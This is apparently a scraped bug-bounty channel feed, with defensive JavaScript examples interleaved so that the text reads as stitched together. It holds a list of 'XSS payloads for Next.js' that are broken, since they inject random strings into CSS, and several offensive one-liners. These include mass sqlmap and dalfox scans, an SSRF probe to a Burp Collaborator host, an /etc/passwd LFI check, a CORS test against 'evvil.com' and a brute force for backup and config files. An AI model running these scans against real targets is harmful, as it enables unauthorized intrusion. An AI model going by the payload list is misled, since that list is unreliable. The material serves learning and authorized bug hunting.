haxshadow
This channel is all about Bug hunting & Cybersec & Ethical Hacking related contents.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
IF you want to support ;)
Lesser-known XSS payloads that work with Next.js

[ What do you think? ]

- Dynamic CSS injection
<div style={background-color: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Variable injection
<div style={--var: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Object Literal injection
<div style={position: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Flexbox injection
<div style={display: flex; justify-content: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Unicode Character injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Dynamic Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + 'px'}}>XSS</div>

- CSS Animation injection
<div style={animation: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Web Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + '-webfont'}}>XSS</div>

- CSS Grid injection
<div style={display: grid; grid-template-columns: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Transform injection
<div style={transform: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>
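The payloads above all depend on one thing: user-controlled text being interpolated into an inline style. In React/Next.js the `style` prop is an object, so the defensive pattern is to validate each value and pass it as an object property rather than building a style string. The following is an added example (not code from the post); the allowlisted property names, the value grammar and the `buildStyle` helper are assumptions made for this example.

```javascript
// Added defensive example: validate user-influenced CSS values before they
// reach a React `style` object. Nothing here is from the original post.

// Properties a hypothetical component lets users influence (assumption).
const ALLOWED_PROPS = new Set([
  'backgroundColor', 'fontFamily', 'justifyContent', 'gridTemplateColumns',
]);

// Allowed value characters: letters, digits, '#', '%', '.', ',', whitespace,
// hyphens, quotes (for font names) and parentheses for functions like rgb().
// Characters that end a declaration or block (';', '}', '<', '>') or that
// introduce a scheme or at-rule (':', '@', '/') are simply not in the class.
const VALUE_RE = /^[A-Za-z0-9#%.,\s()\-"']+$/;
// Belt and braces: reject CSS that pulls in remote or dynamic content.
const FORBIDDEN_RE = /url\s*\(|expression\s*\(|@import/i;

function isSafeCssValue(value) {
  if (typeof value !== 'string' || value.length === 0 || value.length > 64) return false;
  if (!VALUE_RE.test(value) || FORBIDDEN_RE.test(value)) return false;
  // Parentheses must be balanced so a value cannot open a function it never closes.
  let depth = 0;
  for (const ch of value) {
    if (ch === '(') depth += 1;
    else if (ch === ')') depth -= 1;
    if (depth < 0) return false;
  }
  return depth === 0;
}

// Build the object a component should pass as `style`. Unknown properties and
// unsafe values are dropped and reported rather than passed through, so a
// value such as "red; color: blue" never reaches the DOM.
function buildStyle(userStyles) {
  const style = {};
  const rejected = [];
  for (const [prop, value] of Object.entries(userStyles)) {
    if (ALLOWED_PROPS.has(prop) && isSafeCssValue(value)) {
      style[prop] = value;
    } else {
      rejected.push(prop);
    }
  }
  return { style, rejected };
}

// Usage: only backgroundColor survives; fontFamily and position are reported.
const demo = buildStyle({ backgroundColor: '#ff0000', fontFamily: 'a}b', position: 'fixed' });
console.log(demo);
```

The check is deliberately an allowlist on characters rather than a blocklist on known tricks: a style value that cannot contain `;`, `}`, `:` or `<` cannot terminate the declaration it sits in, whatever the browser's CSS parser does with the rest.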
Hi, all my friends... How are you?
Today I made a video that uses a tool through the video and can detect XSS through a tool without having to do anything else.
👨‍💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
XSS ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
SQLi ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
SSRF ⪼
findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
LFI ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
OPEN REDIRECT ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
PROTOTYPE POLLUTION ⪼
subfinder -d target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS//g" | grep "VULN"
CORS ⪼
gau https://vuln.target.com | while read url; do if curl -s -I -H "Origin: https://evvil.com" -X GET "$url" | grep -q 'https://evvil.com'; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done
Extract .js ⪼
echo target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder vuln.target.com | waybackurls | grep -E "\.json(onp?)?$" | anew
Extract URLs from comments ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
Dump In-scope Assets from HackerOne ⪼
curl -sL "https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true" | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]'
Find live host/domain/assets ⪼
subfinder -d vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
Screenshot ⪼
assetfinder -subs-only target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
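The CORS one-liner above only greps for the test origin somewhere in the response, which says nothing about credentials or wildcards. The following is an added example (not code from the post) that parses a raw `curl -I` header block, classifies the response the way a defender reviewing a CORS policy would, and shows the exact-match allowlist a server should use instead of echoing the `Origin` header. The sample response, the classification labels and the helper names are assumptions made for this example.

```javascript
// Added example: evaluate CORS response headers and contrast with a safe
// server-side policy. The header block below is a constructed sample, not a
// real capture.

const SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Access-Control-Allow-Origin: https://evvil.com',
  'Access-Control-Allow-Credentials: true',
  'Content-Type: application/json',
  '',
].join('\r\n');

// Parse "Name: value" lines (as printed by `curl -I`) into an object keyed by
// lower-cased header name. The status line has no ':' and is skipped.
function parseHeaderBlock(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i <= 0) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Classify a response to a request that carried `requestOrigin`.
// Call it with an origin the server has no reason to trust (as the one-liner
// does with evvil.com): a reflected origin is only a finding in that case.
function classifyCors(requestOrigin, headers) {
  const acao = headers['access-control-allow-origin'];
  const credentials =
    (headers['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (acao === undefined) return 'no-cors';
  if (acao === '*') return credentials ? 'wildcard-with-credentials' : 'wildcard';
  if (acao === 'null') return 'null-origin-allowed';
  if (acao === requestOrigin) return credentials ? 'reflected-with-credentials' : 'reflected';
  return 'fixed-origin';
}

// What a server should do instead: compare Origin against an exact allowlist,
// echo it only on a match, and add Vary: Origin so caches keep responses apart.
function corsHeadersFor(requestOrigin, allowlist) {
  if (!requestOrigin || !allowlist.includes(requestOrigin)) return {};
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
    'vary': 'Origin',
  };
}

// Usage: the constructed response reflects an untrusted origin with credentials.
console.log(classifyCors('https://evvil.com', parseHeaderBlock(SAMPLE_RESPONSE)));
```

Note the one-liner's `grep 'https://evvil.com'` would also fire on a `Vary` or `Content-Security-Policy` line that happened to contain the string; matching on the parsed `Access-Control-Allow-Origin` value avoids that noise.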
CVExploits Search
https://cvexploits.io/
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.

tinyxss.terjanq.me

#xss #BugBounty #CyberSecurity
⚡️Broken Access Control to Mass Account Takeover.
Bug - Information disclosure on restricted subdomain

Steps:

subfinder -d target | httpx -mc 403 -o 403_sub.txt
{subfinder with API-KEYS}

cat 403_sub.txt | dirsearch --stdin --exclude-status=401,404,403,429,500,503 -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,conf,csv,html,unc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js,.json --random-agent -f --threads 50 -t 10 --exclude-sizes 0B -o dir.txt

#Infosec #Bugbounty #WAPT
Automated JS Endpoint Extraction and Verification with HTTPX and Gau

echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \
-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
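The pipeline above ends with `jq -r '.extracts[]' | tr -d '[],'`, which flattens the extracted matches by stripping characters and keeps duplicates. The following is an added example (not code from the post) that reads httpx's JSON-lines output directly, applies the same content-type filter, and dedupes endpoints while remembering which script each came from. The field names (`url`, `content_type`, `extracts` as a map of regex name to matches) and the sample lines are assumptions made for this example, not taken from httpx documentation.

```javascript
// Added example: parse httpx -json output and dedupe extracted endpoints.
// Field layout is an assumption; the lines below are constructed samples.

const SAMPLE_HTTPX_OUTPUT = [
  JSON.stringify({
    url: 'https://target.com/static/app.js',
    content_type: 'application/javascript',
    extracts: { regex: ['/api/v1/users', '/api/v1/users', 'https://cdn.target.com/lib.js'] },
  }),
  JSON.stringify({
    url: 'https://target.com/static/vendor.js',
    content_type: 'text/javascript',
    extracts: { regex: ['/api/v1/orders'] },
  }),
  'not json at all',                       // tool banners and warnings end up on stdout too
  JSON.stringify({
    url: 'https://target.com/page.html',   // wrong content type: must be ignored
    content_type: 'text/html',
    extracts: { regex: ['/login'] },
  }),
].join('\n');

// Returns [{ endpoint, sources: [...] }] sorted by endpoint. Lines that are
// not JSON are skipped; records whose content type does not match are ignored,
// mirroring the `-mr` filter in the one-liner.
function extractEndpoints(jsonLines, allowedTypes = /application\/javascript|text\/javascript/) {
  const seen = new Map(); // endpoint -> Set of source script URLs
  for (const line of jsonLines.split('\n')) {
    let rec;
    try {
      rec = JSON.parse(line);
    } catch (e) {
      continue;
    }
    if (!rec || typeof rec !== 'object') continue;
    if (!allowedTypes.test(rec.content_type || '')) continue;
    const groups = rec.extracts && typeof rec.extracts === 'object'
      ? Object.values(rec.extracts)
      : [];
    for (const matches of groups) {
      if (!Array.isArray(matches)) continue;
      for (const m of matches) {
        if (!seen.has(m)) seen.set(m, new Set());
        seen.get(m).add(rec.url);
      }
    }
  }
  return [...seen.entries()]
    .map(([endpoint, sources]) => ({ endpoint, sources: [...sources] }))
    .sort((a, b) => a.endpoint.localeCompare(b.endpoint));
}

// Usage: three unique endpoints; "/login" from the HTML page is not included.
console.log(extractEndpoints(SAMPLE_HTTPX_OUTPUT));
```

Keeping the source URL per endpoint is the part `tr -d` throws away, and it is the part that matters when triaging: an endpoint that appears only in an old vendored bundle is a different finding from one referenced by the application's own code.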
You seem angry with me and don't support me like you used to.
Sorry I can't give you anything or watch any videos because I'm really busy with my college for a few days and I have some work to do.
2025 Roadmap:

1) Portswigger labs:
Pick one lab topic, e.g. SSRF, and give it 2-3 days to complete all of them. For me, I complete these types of labs in some hours, but don't do that. Do it with a relaxed mind and with the aim of learning, not just completing the labs.

2) HackerOne reports:
The next task is to read all reports on the same topic as the labs, like SSRF. Just focus on one bug, follow the methodology, learn the real-world scenario and try to find the same on a real-world target.

3) Medium writeups:
Install the Medium app, make an account there and follow all the publications like InfoSec Write-ups and others related to bug hunting. Read their articles and you will get real-world experience. I will soon share all my writeups also.

4) Bugbountyhunting.com
Make an account on that website. It is good for testing your skills; solve their challenges and you will get real-world experience.

5) CTF
Make an account on HTB and TryHackMe and solve only the web app labs and rooms there to get more experience.

6) YT
Follow some people on YouTube who show real-world PoC practicals. You will get a better understanding from a video than from a written PoC; good for beginners.

7) Bookmark
Bookmark some websites like HackTricks and some GitHub pages like bug hunting methodology repos or repos related to payloads and methods. You will get all the payloads from there.

8) Engage with people or make friends who have the same interest, and work like a team. Collaborate with them; that will double help you in bug hunting.

9) Don't look for common bugs:
I see many people ask me "why don't I find bugs, I still spend so much time". The answer is that you are finding bugs that are so common, like XSS and P4 and more; there are many professional hunters on BBP platforms who have already hunted these on all programs, so it is better to find more advanced bugs like dependency confusion, HTTP request smuggling, BAC, auth bypass etc. Then your chances are more than before. If you are not finding bugs, that means you need to work on more skills and new methods.

10) Avoid social media
Avoid social media, seriously. This will consume so much of your time; their algorithms are so strong that they will engage you with stuff matching your interests. Mostly these will show you love, relationships, breakups, beauty, looks perfection, rich things and other mentally disturbing things like soft porn etc. Also avoid playing online games, please avoid it. If you want to use something, it is better to use LinkedIn, Twitter etc. or related information-sharing apps. This will help your mind focus more on the things that you want.

If you follow these things I am 100% sure you will see results in some months if you are really serious about your life. And I don't think nowadays you need any paid course stuff when the information is already free on the internet; you have all things in your hand, you just need to find it. Also, after ChatGPT I don't think you need to struggle much on all these things; make ChatGPT your friend. Also, meanwhile, if you need any help regarding any bugs or chaining, always DM me, I will surely help when I get time. All the best for your new year journey ❤️
Find XSS Using KNOXSS

Find Subdomains (Use the subdomain enumeration techniques that I have already posted.)


# Subdomain Enumeration
subfinder -d domain -all | tee -a domain.subs
subdominator -d domain | tee -a domain.subs

# Check live subdomains
cat domain.subs | httpx -o domain.live
cat domain.live | wayback | anew xss-wayback
katana -list domain.live -o xss-katana
cat domain.live | gau --subs -o xss-gau

# Merge All results
cat xss-wayback xss-katana xss-gau | anew xss.txt

cat xss.txt | sort -u | grep "=" | egrep -iv "\.(css|woff|woff2|txt|js|m4r|m4p|m4b|ipa|asa|pkg|crash|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|webp|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|webm|mpp|_otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|_ttf|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)" | uro | httpx | anew xss

# Run knoxnl with GET & POST methods
knoxnl -i xss.txt -X BOTH -s -o xssoutput.txt
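The filtering step in the pipeline above keeps URLs containing "=", drops a long list of static-file extensions with an unanchored `egrep -iv`, and then relies on `uro` to collapse near-duplicates. The following is an added example (not code from the post) that implements that step as one function and goes a little further than the shell pipeline: it parses each URL, so the extension check applies to the path rather than to a query value such as `file=report.pdf`, and it dedupes on host + path + sorted parameter names, which is roughly what `uro` does. The extension list is shortened, and the sample URLs are constructed for this example.

```javascript
// Added example: select and dedupe parameterised URLs for testing.
// Sample URLs below are constructed, not collected from any target.

const SAMPLE_URLS = [
  'https://app.target.com/search?q=test',
  'https://app.target.com/search?q=other',            // same host/path/param names -> duplicate
  'https://app.target.com/search?q=x&page=2',         // different parameter set -> kept
  'https://app.target.com/static/app.js?v=3',         // static file -> dropped
  'https://app.target.com/about',                     // no parameters -> dropped
  'https://app.target.com/download?file=report.pdf',  // extension only in the query -> kept
  'mailto:someone@target.com?subject=x',              // not http(s) -> dropped
  'garbage',                                          // unparseable -> dropped
];

// Shortened version of the extension list in the egrep above (assumption).
const STATIC_EXT = new Set([
  'css', 'woff', 'woff2', 'txt', 'js', 'png', 'jpg', 'jpeg', 'gif', 'svg',
  'ico', 'pdf', 'zip', 'mp4', 'mp3', 'webp', 'json',
]);

function candidateUrls(urls) {
  const seen = new Set();
  const out = [];
  for (const raw of urls) {
    let u;
    try {
      u = new URL(raw.trim());
    } catch (e) {
      continue; // not a URL at all
    }
    if (u.protocol !== 'http:' && u.protocol !== 'https:') continue;
    const params = [...u.searchParams.keys()];
    if (params.length === 0) continue; // nothing to inject into, equivalent to grep "="
    // Extension check on the path only: "/download?file=report.pdf" is kept.
    const lastSegment = u.pathname.split('/').pop() || '';
    const ext = lastSegment.includes('.') ? lastSegment.split('.').pop().toLowerCase() : '';
    if (STATIC_EXT.has(ext)) continue;
    // uro-style key: same host, path and parameter names -> same test case.
    const key = `${u.host}${u.pathname}?${params.sort().join('&')}`;
    if (seen.has(key)) continue;
    seen.add(key);
    out.push(u.href);
  }
  return out;
}

// Usage: three URLs survive from the eight constructed samples.
console.log(candidateUrls(SAMPLE_URLS));
```

The same normalisation is useful on the defensive side: deduping request logs by host, path and parameter names is how you turn thousands of scanner hits into the handful of endpoints that were actually probed.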